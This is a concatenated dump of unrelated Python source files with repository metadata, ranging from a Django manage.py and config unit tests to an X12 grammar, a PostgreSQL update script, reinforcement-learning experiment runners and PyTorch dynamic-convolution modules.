#   -b/--breakpoint_db  breakpoint DB file (default: <root_dir>/bp.db)
#   -l/--log            log DB file (default: timestamped Record-*.db)
parser = OptionParser(usage="usage: %prog [options] args")
parser.add_option("-b", "--breakpoint_db", dest="breakpoint_db", type="string", default="", metavar="BREAKPOINT_DB",
                  help="Breakpoint DB filename")
parser.add_option("-l", "--log", dest="log", type="string", default="", metavar="LOG", help="Log filename")
(options, args) = parser.parse_args(sys.argv)

# NOTE(review): sys.argv[-3] assumes a fixed argument layout -- confirm the
# expected invocation (this script appears to run inside a debugger session).
root_dir = os.path.dirname(sys.argv[-3])
if options.breakpoint_db == '':
    options.breakpoint_db = os.path.join(root_dir, 'bp.db')
if options.log == '':
    # Timestamped default so repeated runs do not clobber earlier logs.
    options.log = os.path.join(root_dir, time.strftime("Record-%Y%m%d-%H%M%S.db"))

logging.basicConfig(level=logging.DEBUG)
root = logging.getLogger()

windbgtoolRun = windbgtool.Run()
# windbgtoolRun.SetSymbolPath()
if options.breakpoint_db:
    windbgtoolRun.LoadBreakPoints(options.breakpoint_db, options.log)
    windbgtoolRun.Continue()
| [
"oh.jeongwook@gmail.com"
] | oh.jeongwook@gmail.com |
5a98ae5a045a32ec3241b0ba03fe150df8ed8e90 | d5d7b0773d312545a0b36f72d119a3feae3c200b | /manage.py | 1d906eb32601e4c1065a1be1dd03f8f36f891566 | [] | no_license | princ3raj/advanceBlogApp | 0e23812a5ff27ad5bf2238422073a5ab45d4ae0a | ebed84f2899773cd15fb66f515f9f5787307056a | refs/heads/master | 2023-06-11T02:57:19.954941 | 2021-06-16T13:09:40 | 2021-06-16T13:09:40 | 298,969,263 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 670 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'advanceBlogApp.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"princ3raj1999@gmail.com"
] | princ3raj1999@gmail.com |
3a014455f400edcae05b46b534a82c2f547fa079 | be69a4f0093561a38449d717112ce94a7616e505 | /joulescope_ui/test/test_config.py | 1e346c9eba7c0754e605af629da6bbe677ae6325 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | adam-urbanczyk/pyjoulescope_ui | b0692178f4b4257427e97ce8e67b79279d6e04ba | fe5475c8d75b980b63dc3ec6d14f7de99e33efc1 | refs/heads/master | 2020-06-17T09:21:12.496697 | 2019-07-02T14:57:18 | 2019-07-02T14:57:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,596 | py | # Copyright 2018 Jetperch LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Test the configuration file
"""
import unittest
import os
import io
import tempfile
import shutil
from joulescope_ui.config import load_config_def, load_config, save_config
MYPATH = os.path.dirname(os.path.abspath(__file__))
PATH = os.path.dirname(MYPATH)
def load_def():
path = os.path.join(PATH, 'config_def.json5')
return load_config_def(path)
class TestConfig(unittest.TestCase):
def test_load_config_def(self):
d = load_def()
self.assertIn('info', d)
self.assertIn('children', d)
def test_load_config_def_default(self):
d = load_config_def()
self.assertIn('info', d)
self.assertIn('children', d)
def test_file_not_found(self):
d = load_def()
c = load_config(d, '/path/to/nothing.json5')
self.assertIn('General', c)
self.assertIn('data_path', c['General'])
self.assertNotEqual('__APP_PATH__', c['General']['data_path'])
self.assertIn('Device', c)
self.assertIn('i_range', c['Device'])
self.assertEqual('auto', c['Device']['i_range'])
def test_load_filehandle(self):
d = load_def()
f = io.BytesIO("""{'Device': {'i_range': 'auto'}}""".encode('utf-8'))
c = load_config(d, f)
self.assertEqual('auto', c['Device']['i_range'])
def test_load_bad_option(self):
d = load_def()
f = io.BytesIO("""{'Device': {'i_range': '__invalid__'}}""".encode('utf-8'))
with self.assertRaises(ValueError):
c = load_config(d, f)
def test_load_default(self):
d = load_def()
f = io.BytesIO("""{'Device': {}}""".encode('utf-8'))
c = load_config(d, f)
self.assertEqual('auto', c['Device']['i_range'])
def test_load_alias(self):
d = load_def()
f = io.BytesIO("""{'Device': {'i_range': '2'}}""".encode('utf-8'))
c = load_config(d, f)
self.assertEqual('180 mA', c['Device']['i_range'])
def test_filename(self):
d = load_def()
fname = os.path.join(MYPATH, 'cfg1.json5')
c = load_config(d, fname)
self.assertEqual('180 mA', c['Device']['i_range'])
class TestConfigSave(unittest.TestCase):
def setUp(self):
self._tempdir = tempfile.mkdtemp()
self._filename1 = os.path.join(self._tempdir, 'joulescope_config.json5')
def tearDown(self):
shutil.rmtree(self._tempdir)
def test_load_save_load_path(self):
d = load_def()
fname = os.path.join(MYPATH, 'cfg1.json5')
c1 = load_config(d, fname)
save_config(c1, self._filename1)
c2 = load_config(d, self._filename1)
self.assertEqual(c1, c2)
def test_load_save_load_filehandle(self):
d = load_def()
fname = os.path.join(MYPATH, 'cfg1.json5')
c1 = load_config(d, fname)
with open(self._filename1, 'w') as f:
save_config(c1, f)
with open(self._filename1, 'r') as f:
c2 = load_config(d, f)
self.assertEqual(c1, c2)
| [
"matt.liberty@jetperch.com"
] | matt.liberty@jetperch.com |
684aa470a21d1d3d0dabc09d2afaf2008ecf134c | eb56b01d5900db238bd94fc0283866575e37d8b5 | /aerobot/migrations/0014_delete_gallery.py | e5ee851484617a7b80075a25af3b3a77990afd64 | [] | no_license | prathmesh2048/Aerobots-Website | 43220db29a89edda059a34f8b7e3c14657103a4e | 9c11a5777b770df7aa4f8aec16e7c61f25419c0a | refs/heads/master | 2023-03-07T06:24:43.308905 | 2021-02-22T08:51:58 | 2021-02-22T08:51:58 | 292,319,707 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | # Generated by Django 3.1 on 2020-09-03 10:24
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('aerobot', '0013_remove_gallery_link'),
]
operations = [
migrations.DeleteModel(
name='Gallery',
),
]
| [
"prathmeshnandurkar123@gmail.com"
] | prathmeshnandurkar123@gmail.com |
41ed640797d8b39a7645ff460aec3b52decb2d9d | 14a1c405bb1fe6fc7b5ccf4d6b8a2d042309ce93 | /tests/test_github_com.py | a41c327a607414f6008fddac4bec79d69c44f431 | [
"MIT"
] | permissive | the-dan/import_from_github_com | f067efd57edce46d83857101516188d5b6ce778d | 8fdd185b73835f637bb3e789d15e1ce13ff8f5cb | refs/heads/master | 2022-12-07T21:37:44.645946 | 2020-08-22T14:27:15 | 2020-08-22T14:27:15 | 288,563,107 | 0 | 0 | MIT | 2020-08-18T20:58:28 | 2020-08-18T20:58:27 | null | UTF-8 | Python | false | false | 284 | py | def test_import_module():
from github_com.kennethreitz import requests
assert requests.get('https://github.com').status_code == 200
def test_import_from_module():
from github_com.kennethreitz.requests import get
assert get('https://github.com').status_code == 200
| [
"nvbn.rm@gmail.com"
] | nvbn.rm@gmail.com |
d61d98030e8ca3ecbdbfec6fe7148c08a55779ed | 62e58c051128baef9452e7e0eb0b5a83367add26 | /x12/5020/999005020.py | f972b49f11a222801df1d8cfa147f11ba02906ea | [] | no_license | dougvanhorn/bots-grammars | 2eb6c0a6b5231c14a6faf194b932aa614809076c | 09db18d9d9bd9d92cefbf00f1c0de1c590fe3d0d | refs/heads/master | 2021-05-16T12:55:58.022904 | 2019-05-17T15:22:23 | 2019-05-17T15:22:23 | 105,274,633 | 0 | 0 | null | 2017-09-29T13:21:21 | 2017-09-29T13:21:21 | null | UTF-8 | Python | false | false | 674 | py | from bots.botsconfig import *
from records005020 import recorddefs
syntax = {
'version' : '00403', #version of ISA to send
'functionalgroup' : 'FA',
}
structure = [
{ID: 'ST', MIN: 1, MAX: 1, LEVEL: [
{ID: 'AK1', MIN: 1, MAX: 1},
{ID: 'AK2', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'IK3', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'CTX', MIN: 0, MAX: 10},
{ID: 'IK4', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'CTX', MIN: 0, MAX: 10},
]},
]},
{ID: 'IK5', MIN: 1, MAX: 1},
]},
{ID: 'AK9', MIN: 1, MAX: 1},
{ID: 'SE', MIN: 1, MAX: 1},
]}
]
| [
"jason.capriotti@gmail.com"
] | jason.capriotti@gmail.com |
bdaeffeb33e535244e7fc70fc8248c8c9842f951 | f4663fe7fb660b62cca0c17bfd4c568bbc5bfb49 | /UNO-R3/examples/test_led.py | 485d9c10bf2ad38162d41e7e56ca6cc2675b1b70 | [] | no_license | mchobby/pyboard-driver | 274f0f90e895bdf6f80c27a716788e5a444c24d3 | 3fd45b81588d00479bf55d3dc7ea0ece3cb170de | refs/heads/master | 2023-04-26T14:27:11.323019 | 2023-04-13T21:37:50 | 2023-04-13T21:37:50 | 63,084,841 | 12 | 10 | null | 2022-11-27T19:35:00 | 2016-07-11T16:37:00 | Python | UTF-8 | Python | false | false | 430 | py | # Test the Neopixel present on the PYBOARD-UNO-R3 board
#
from uno import pixels
from time import sleep
led = pixels() # just one LED
red = (255,0,0)
green = (0,255,0)
blue = (0,0,255)
led.fill( red )
led.write()
sleep(1)
led.fill( green )
led.write()
sleep(1)
led.fill( blue )
led.write()
sleep(1)
led.fill( (255,0,255) ) # Magenta
led.write()
sleep(1)
led.fill( (0,0,0) ) # Black
led.write()
print("That's all Folks!")
| [
"info@mchobby.be"
] | info@mchobby.be |
640aef9894f039267aba382904d3941646e285ee | f34dc191304f0c54527948aa7b7123fd6efe85b9 | /insert.py | cda7d978b6b817a7d459a0f2974143bf3c9060a9 | [] | no_license | sujith1919/groza | b3fc4641de48423da9a219c33e390ea2c4915687 | 5b68e052266d5307a0058d7031b3b20c4a1b9bcb | refs/heads/master | 2023-02-28T03:09:51.568592 | 2021-02-02T16:34:49 | 2021-02-02T16:34:49 | 335,353,163 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,685 | py | #!/usr/bin/python
import psycopg2
from config import config
def connect():
""" Connect to the PostgreSQL database server """
conn = None
try:
# read connection parameters
params = config()
# connect to the PostgreSQL server
print('Connecting to the PostgreSQL database...')
conn = psycopg2.connect(**params)
# create a cursor
cur = conn.cursor()
# execute a statement
print('PostgreSQL database version:')
cur.execute('SELECT version()')
db_version1 = cur.fetchone()
print(db_version1)
# display the PostgreSQL database server version
cur.execute('SELECT * from LIFEBOAT')
db_version2 = cur.fetchone()
print(db_version2)
#cur.fetchall()
# close the communication with the PostgreSQL
#cur.execute("INSERT INTO LIFEBOAT (flag,hostname, nagios_status, dr_hostname, host_type) VALUES ('0','st13p29im-lifeboat002.me.com','staging','mr21p30im-lifeboat002.me.com','lifeboat')" )
#conn.commit()
cur.execute("SELECT * FROM LIFEBOAT where hostname='st13p29im-lifeboat033.me.com'")
cur.fetchall()
if cur.rowcount == 1:
cur.execute("UPDATE LIFEBOAT SET nagios_status=%s, kernel_version=%s where hostname='st13p29im-lifeboat033.me.com'" ,('staging','4.1.12-124.14.2.el6uek'))
conn.commit()
else:
print("insert")
cur.close()
except (Exception, psycopg2.DatabaseError) as error:
print(error)
finally:
if conn is not None:
conn.close()
print('Database connection closed.')
if __name__ == '__main__':
connect()
| [
"jayarajan.sujith@oracle.com"
] | jayarajan.sujith@oracle.com |
58d53af289dac1c57d3dbf5b28b1bfc2f85b9999 | c9b787e405437ae35e7c3865d0fd59e97a9c5918 | /noveldl/modules/sources/__init__.py | c6f928aa43dcf6c35715b4dfd6488def3176b00b | [
"Apache-2.0"
] | permissive | CharlesPikachu/noveldl | 98944a85c1d0d05bb8eba80ef77b353eb4664289 | 37f0e27a2e1168884a83802c8808d6bc9cbfe8c0 | refs/heads/main | 2023-05-23T19:50:42.250136 | 2022-07-20T15:11:02 | 2022-07-20T15:11:02 | 487,217,661 | 7 | 2 | null | null | null | null | UTF-8 | Python | false | false | 110 | py | '''initialize'''
from .zw81 import Zw81Novel
from .gebiqu import GeBiquNovel
from .xbiquge import XbiqugeNovel | [
"1159254961@qq.com"
] | 1159254961@qq.com |
43fd9e035ebf49370ede93a58cceb5a1a2df58a2 | 1c91439673c898c2219ee63750ea05ff847faee1 | /mmcls/models/heads/multi_label_linear_head.py | 0e9d0684a1b4aff4fa92ba807e550a4de98a6949 | [
"Apache-2.0"
] | permissive | ChenhongyiYang/GPViT | d7ba7f00d5139a989a999664ab0874c5c9d53d4d | 2b8882b2da41d4e175fe49a33fcefad1423216f4 | refs/heads/main | 2023-06-08T00:10:07.319078 | 2023-05-26T15:52:54 | 2023-05-26T15:52:54 | 577,075,781 | 78 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,948 | py | # Copyright (c) OpenMMLab. All rights reserved.
import torch
import torch.nn as nn
from ..builder import HEADS
from .multi_label_head import MultiLabelClsHead
@HEADS.register_module()
class MultiLabelLinearClsHead(MultiLabelClsHead):
"""Linear classification head for multilabel task.
Args:
num_classes (int): Number of categories.
in_channels (int): Number of channels in the input feature map.
loss (dict): Config of classification loss.
init_cfg (dict | optional): The extra init config of layers.
Defaults to use dict(type='Normal', layer='Linear', std=0.01).
"""
def __init__(self,
num_classes,
in_channels,
loss=dict(
type='CrossEntropyLoss',
use_sigmoid=True,
reduction='mean',
loss_weight=1.0),
init_cfg=dict(type='Normal', layer='Linear', std=0.01)):
super(MultiLabelLinearClsHead, self).__init__(
loss=loss, init_cfg=init_cfg)
if num_classes <= 0:
raise ValueError(
f'num_classes={num_classes} must be a positive integer')
self.in_channels = in_channels
self.num_classes = num_classes
self.fc = nn.Linear(self.in_channels, self.num_classes)
def pre_logits(self, x):
if isinstance(x, tuple):
x = x[-1]
return x
def forward_train(self, x, gt_label, **kwargs):
x = self.pre_logits(x)
gt_label = gt_label.type_as(x)
cls_score = self.fc(x)
losses = self.loss(cls_score, gt_label, **kwargs)
return losses
def simple_test(self, x, sigmoid=True, post_process=True):
"""Inference without augmentation.
Args:
x (tuple[Tensor]): The input features.
Multi-stage inputs are acceptable but only the last stage will
be used to classify. The shape of every item should be
``(num_samples, in_channels)``.
sigmoid (bool): Whether to sigmoid the classification score.
post_process (bool): Whether to do post processing the
inference results. It will convert the output to a list.
Returns:
Tensor | list: The inference results.
- If no post processing, the output is a tensor with shape
``(num_samples, num_classes)``.
- If post processing, the output is a multi-dimentional list of
float and the dimensions are ``(num_samples, num_classes)``.
"""
x = self.pre_logits(x)
cls_score = self.fc(x)
if sigmoid:
pred = torch.sigmoid(cls_score) if cls_score is not None else None
else:
pred = cls_score
if post_process:
return self.post_process(pred)
else:
return pred
| [
"chenhongyiyang@Chenhongyis-MacBook-Pro.local"
] | chenhongyiyang@Chenhongyis-MacBook-Pro.local |
d945fc30415b316e05bee88c5573d829ba4719b9 | 084a13b6524e21914826e842eeefefd09570a970 | /experiments/procgen_exploration/jumper/ppo_cnd_2_0.py | 9ac4ad7392e37ae8846941d8fc80871f8484960a | [
"MIT"
] | permissive | michalnand/reinforcement_learning | 28aa0e2c92b6112cf366eff0e0d6a78b9a56e94f | 01635014a37a4c871766b4cdd2caaa26a0c2d8cc | refs/heads/main | 2023-06-01T10:27:36.601631 | 2023-02-12T19:46:01 | 2023-02-12T19:46:01 | 217,841,101 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,187 | py | import time
import torch
import RLAgents
import models.ppo_cnd_2_0.src.model_ppo as ModelPPO
import models.ppo_cnd_2_0.src.model_cnd_target as ModelCNDTarget
import models.ppo_cnd_2_0.src.model_cnd as ModelCND
import models.ppo_cnd_2_0.src.config as Config
#torch.cuda.set_device("cuda:1")
path = "models/ppo_cnd_2_0/"
config = Config.Config()
#config.envs_count = 1
envs = RLAgents.MultiEnvSeq("procgen-jumper-v0", RLAgents.WrapperProcgenExploration, config.envs_count)
#envs = RLAgents.MultiEnvSeq("procgen-jumper-v0", RLAgents.WrapperProcgenExplorationRender, config.envs_count)
agent = RLAgents.AgentPPOCND(envs, ModelPPO, ModelCNDTarget, ModelCND, config)
max_iterations = 500000
trainig = RLAgents.TrainingIterations(envs, agent, max_iterations, path, 128)
trainig.run()
'''
agent.load(path)
agent.disable_training()
episodes = 0
total_score = 0.0
reward_sum = 0.0
while True:
reward, done, info = agent.main()
#envs.render(0)
#agent.render(0)
reward_sum+= reward
if done:
episodes+= 1
total_score+= reward_sum
reward_sum = 0
print("DONE ", episodes, total_score/episodes)
''' | [
"michal.nand@gmail.com"
] | michal.nand@gmail.com |
498922c4b2af734bee8adc81ca0627c2f25b46c0 | f719ec76a8417fc05a2d46ada2501052e2bf9469 | /dicg/torch/baselines/__init__.py | 8d90ef326b8eee216b97735a1d2efda2c656eaca | [] | no_license | yang-xy20/DICG | cc31064a3e4a3dd01414161e42b228c2c09bfea7 | c64ba9dbbe0f2b745cd04ce516aa1fed4c2cffc7 | refs/heads/master | 2023-07-04T18:25:18.461196 | 2021-08-19T21:34:06 | 2021-08-19T21:34:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 289 | py | from dicg.torch.baselines.gaussian_mlp_baseline import GaussianMLPBaseline
from dicg.torch.baselines.dicg_critic import DICGCritic
from dicg.torch.baselines.attention_mlp_critic import AttentionMLPCritic
__all__ = [
'GaussianMLPBaseline',
'DICGCritic',
'AttentionMLPCritic',
] | [
"lisheng@stanford.edu"
] | lisheng@stanford.edu |
dd0b358353cfac1a73baa1e7653032b942731d2a | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03479/s081451690.py | 2d434d0c722ffcf0dc82c9e9c3c1e7001d970560 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 139 | py | X,Y = map(int,input().split())
ans = 0
for i in range(Y):
if X <= Y:
ans += 1
X *= 2
else:
break
print(ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
a1c663679afc46149b4c75d89b9206ff3c6e50e4 | 3313c4750edaebd264108c6ee3e120bd583abde8 | /tools/cvpods_playground/fcos.dynamic.res50.1x.d8.tau-1_5.groups1.lambda-0/dynamic_conv.py | ca263cc90011e87d599675bbbaa6b70b5b0999a8 | [
"Apache-2.0"
] | permissive | jingmouren/LearnableTreeFilterV2 | bf63e754fb0943afb039ee0111a9a884fe46eb38 | 3814a5a84c0a5c33d6538749eaf5aed4827366de | refs/heads/main | 2023-01-22T22:47:15.581961 | 2020-11-27T04:07:33 | 2020-11-27T04:07:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,616 | py | import math
import torch
import torch.nn.functional as F
from torch import nn
from prodict import Prodict
from cvpods.layers import get_norm
from cvpods.modeling.nn_utils import weight_init
from cvpods.layers import Conv2d, get_activation, get_norm, masked_conv2d
def get_module_running_cost(net):
outputs = [[], [], []]
for module in net.modules():
if isinstance(module, SpatialGate):
cost = module.running_cost
if cost is not None:
for idx in range(len(cost)):
outputs[idx].append(cost[idx].reshape(cost[idx].shape[0], -1).sum(1))
module.clear_running_cost()
for idx in range(len(cost)):
outputs[idx] = sum(outputs[idx])
return outputs
class BasicBlock(nn.Module):
def __init__(
self,
in_channels,
out_channels,
stride=1,
norm="BN",
activation=None
):
super().__init__()
if in_channels != out_channels:
self.shortcut = Conv2d(
in_channels,
out_channels,
kernel_size=1,
stride=stride,
bias=False,
norm=get_norm(norm, out_channels),
)
else:
self.shortcut = None
self.activation = get_activation(activation)
self.conv1 = Conv2d(
in_channels,
out_channels,
kernel_size=3,
stride=stride,
padding=1,
bias=False,
norm=get_norm(norm, out_channels),
)
self.conv2 = Conv2d(
out_channels,
out_channels,
kernel_size=3,
stride=1,
padding=1,
bias=False,
norm=get_norm(norm, out_channels),
)
def masked_inference(self, x, gate):
# gate = torch.zeros_like(gate)
# out = masked_conv2d(x, F.max_pool2d(gate, kernel_size=3, stride=1, padding=1).squeeze(dim=1),
# self.conv1.weight, self.conv1.bias, 1, 1, [self.conv1.norm, self.activation])
# out = masked_conv2d(out, gate.squeeze(dim=1), self.conv2.weight,
# self.conv2.bias, 1, 1, self.conv2.norm)
out = x
return out
def forward(self, x, gate_func):
if self.shortcut is not None:
shortcut = self.shortcut(x)
else:
shortcut = x
if not self.training:
out = gate_func(x, x, self.masked_inference)
out = out + shortcut
out = self.activation(out)
return out
out = self.conv1(x)
out = self.activation(out)
out = self.conv2(out)
out = gate_func(out, x) + shortcut
out = self.activation(out)
return out
class SpatialGate(nn.Module):
def __init__(
self,
in_channels : int,
num_groups : int = 1,
kernel_size : int = 1,
padding : int = 0,
stride : int = 1,
gate_activation : str = "ReTanH",
gate_activation_kargs : dict = None,
get_running_cost : callable = None
):
super(SpatialGate, self).__init__()
self.num_groups = num_groups
self.gate_conv = nn.Conv2d(in_channels,
num_groups,
kernel_size,
padding=padding,
stride=stride)
self.gate_activation = gate_activation
self.gate_activation_kargs = gate_activation_kargs
if gate_activation == "ReTanH":
self.gate_activate = lambda x : torch.tanh(x).clamp(min=0)
elif gate_activation == "Sigmoid":
self.gate_activate = lambda x : torch.sigmoid(x)
elif gate_activation == "GeReTanH":
assert "tau" in gate_activation_kargs
tau = gate_activation_kargs["tau"]
ttau = math.tanh(tau)
self.gate_activate = lambda x : ((torch.tanh(x - tau) + ttau) / (1 + ttau)).clamp(min=0)
else:
raise NotImplementedError()
self.get_running_cost = get_running_cost
self.running_cost = None
self.init_parameters()
def init_parameters(self, init_gate=0.99):
if self.gate_activation == "ReTanH":
bias_value = 0.5 * math.log((1 + init_gate) / (1 - init_gate))
elif self.gate_activation == "Sigmoid":
bias_value = 0.5 * math.log(init_gate / (1 - init_gate))
elif self.gate_activation == "GeReTanH":
tau = self.gate_activation_kargs["tau"]
bias_value = 0.5 * math.log((1 + init_gate * math.exp(2 * tau)) / (1 - init_gate))
nn.init.normal_(self.gate_conv.weight, std=0.01)
nn.init.constant_(self.gate_conv.bias, bias_value)
def encode(self, *inputs):
outputs = [x.view(x.shape[0] * self.num_groups, -1, *x.shape[2:]) for x in inputs]
return outputs
def decode(self, *inputs):
outputs = [x.view(x.shape[0] // self.num_groups, -1, *x.shape[2:]) for x in inputs]
return outputs
def update_running_cost(self, gate):
if self.get_running_cost is not None:
cost = self.get_running_cost(gate)
if self.running_cost is not None:
self.running_cost = [x + y for x, y in zip(self.running_cost, cost)]
else:
self.running_cost = cost
def clear_running_cost(self):
self.running_cost = None
def forward(self, data_input, gate_input, masked_func=None):
gate = self.gate_activate(self.gate_conv(gate_input))
self.update_running_cost(gate)
if masked_func is not None:
data_input = masked_func(data_input, gate)
data, gate = self.encode(data_input, gate)
output, = self.decode(data * gate)
return output
class DynamicBottleneck(nn.Module):
def __init__(
self,
in_channels : int,
out_channels : int,
kernel_size : int = 1,
padding : int = 0,
stride : int = 1,
num_groups : int = 1,
norm: str = "GN",
gate_activation : str = "ReTanH",
gate_activation_kargs : dict = None
):
super(DynamicBottleneck, self).__init__()
self.num_groups = num_groups
self.norm = norm
self.in_channels = in_channels
self.out_channels = out_channels
self.bottleneck = BasicBlock(in_channels,
out_channels,
stride=stride,
norm=norm,
activation=Prodict(NAME="ReLU", INPLACE=True))
self.gate = SpatialGate(in_channels,
num_groups=num_groups,
kernel_size=kernel_size,
padding=padding,
stride=stride,
gate_activation=gate_activation,
gate_activation_kargs=gate_activation_kargs,
get_running_cost=self.get_running_cost)
self.init_parameters()
def init_parameters(self):
self.gate.init_parameters()
for layer in self.bottleneck.modules():
if isinstance(layer, nn.Conv2d):
torch.nn.init.normal_(layer.weight, mean=0, std=0.01)
if layer.bias is not None:
torch.nn.init.constant_(layer.bias, 0)
if isinstance(layer, nn.GroupNorm):
torch.nn.init.constant_(layer.weight, 1)
torch.nn.init.constant_(layer.bias, 0)
def get_running_cost(self, gate):
conv_costs = [x * 3 ** 2 for x in [self.in_channels * self.out_channels, self.out_channels ** 2]]
if self.in_channels != self.out_channels:
conv_costs[-1] += self.in_channels * out_channels
norm_cost = self.out_channels if self.norm != "none" else 0
unit_costs = [conv_cost + norm_cost for conv_cost in conv_costs]
running_cost = None
for unit_cost in unit_costs[::-1]:
num_groups = gate.shape[1]
hard_gate = (gate != 0).float()
cost = [gate * unit_cost / num_groups,
hard_gate * unit_cost / num_groups,
torch.ones_like(gate) * unit_cost / num_groups]
cost = [x.flatten(1).sum(-1) for x in cost]
gate = F.max_pool2d(gate, kernel_size=3, stride=1, padding=1)
gate = gate.max(dim=1, keepdim=True).values
if running_cost is None:
running_cost = cost
else:
running_cost = [x + y for x, y in zip(running_cost, cost)]
return running_cost
def forward(self, input):
output = self.bottleneck(input, self.gate)
# output = self.gate(data, input)
return output
class DynamicConv2D(nn.Module):
def __init__(
self,
in_channels : int,
out_channels : int,
num_convs : int,
kernel_size : int = 1,
padding : int = 0,
stride : int = 1,
num_groups : int = 1,
norm: str = "GN",
gate_activation : str = "ReTanH",
gate_activation_kargs : dict = None,
depthwise: bool = False
):
super(DynamicConv2D, self).__init__()
if depthwise:
assert in_channels == out_channels
self.num_groups = num_groups
self.norm = norm
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.depthwise = depthwise
convs = []
for _ in range(num_convs):
convs += [nn.Conv2d(in_channels,
out_channels,
kernel_size,
stride=stride,
padding=padding,
groups=in_channels if depthwise else 1),
get_norm(norm, in_channels)]
in_channels = out_channels
self.convs = nn.Sequential(*convs)
self.gate = SpatialGate(in_channels,
num_groups=num_groups,
kernel_size=kernel_size,
padding=padding,
stride=stride,
gate_activation=gate_activation,
gate_activation_kargs=gate_activation_kargs,
get_running_cost=self.get_running_cost)
self.init_parameters()
def init_parameters(self):
self.gate.init_parameters()
for layer in self.convs.modules():
if isinstance(layer, nn.Conv2d):
torch.nn.init.normal_(layer.weight, mean=0, std=0.01)
if layer.bias is not None:
torch.nn.init.constant_(layer.bias, 0)
if isinstance(layer, nn.GroupNorm):
torch.nn.init.constant_(layer.weight, 1)
torch.nn.init.constant_(layer.bias, 0)
def get_running_cost(self, gate):
if self.depthwise:
conv_cost = self.in_channels * len(self.convs) * \
self.kernel_size ** 2
else:
conv_cost = self.in_channels * self.out_channels * len(self.convs) * \
self.kernel_size ** 2
norm_cost = self.out_channels if self.norm != "none" else 0
unit_cost = conv_cost + norm_cost
hard_gate = (gate != 0).float()
cost = [gate.detach() * unit_cost / self.num_groups,
hard_gate * unit_cost / self.num_groups,
torch.ones_like(gate) * unit_cost / self.num_groups]
cost = [x.flatten(1).sum(-1) for x in cost]
return cost
def forward(self, input):
data = self.convs(input)
output = self.gate(data, input)
return output
class DynamicScale(nn.Module):
def __init__(
self,
in_channels : int,
out_channels : int,
num_convs: int = 1,
kernel_size : int = 1,
padding : int = 0,
stride : int = 1,
num_groups : int = 1,
num_adjacent_scales: int = 2,
depth_module: nn.Module = None,
resize_method: str = "bilinear",
norm: str = "GN",
gate_activation : str = "ReTanH",
gate_activation_kargs : dict = None
):
super(DynamicScale, self).__init__()
self.num_groups = num_groups
self.num_adjacent_scales = num_adjacent_scales
self.depth_module = depth_module
dynamic_convs = [DynamicConv2D(
in_channels,
out_channels,
num_convs=num_convs,
kernel_size=kernel_size,
padding=padding,
stride=stride,
num_groups=num_groups,
norm=norm,
gate_activation=gate_activation,
gate_activation_kargs=gate_activation_kargs,
depthwise=True
) for _ in range(num_adjacent_scales)]
self.dynamic_convs = nn.ModuleList(dynamic_convs)
if resize_method == "bilinear":
self.resize = lambda x, s : F.interpolate(
x, size=s, mode="bilinear", align_corners=True)
else:
raise NotImplementedError()
self.scale_weight = nn.Parameter(torch.zeros(1))
self.output_weight = nn.Parameter(torch.ones(1))
self.init_parameters()
def init_parameters(self):
for module in self.dynamic_convs:
module.init_parameters()
def forward(self, inputs):
dynamic_scales = []
for l, x in enumerate(inputs):
dynamic_scales.append([m(x) for m in self.dynamic_convs])
outputs = []
for l, x in enumerate(inputs):
scale_feature = []
for s in range(self.num_adjacent_scales):
l_source = l + s - self.num_adjacent_scales // 2
l_source = l_source if l_source < l else l_source + 1
if l_source >= 0 and l_source < len(inputs):
feature = self.resize(dynamic_scales[l_source][s], x.shape[-2:])
scale_feature.append(feature)
scale_feature = sum(scale_feature) * self.scale_weight + x * self.output_weight
if self.depth_module is not None:
scale_feature = self.depth_module(scale_feature)
outputs.append(scale_feature)
return outputs
| [
"stevengrove@stu.xjtu.edu.cn"
] | stevengrove@stu.xjtu.edu.cn |
eccc336a352e0d802ed588afb9de41f3723494d3 | ac82f56dc4c7cb6b370d51c0779113a981ef3f01 | /intermol/forces/lj_sigeps_nonbonded_type.py | b06a03a785faa4b02f7e13d431a7dec2ac915d29 | [
"MIT"
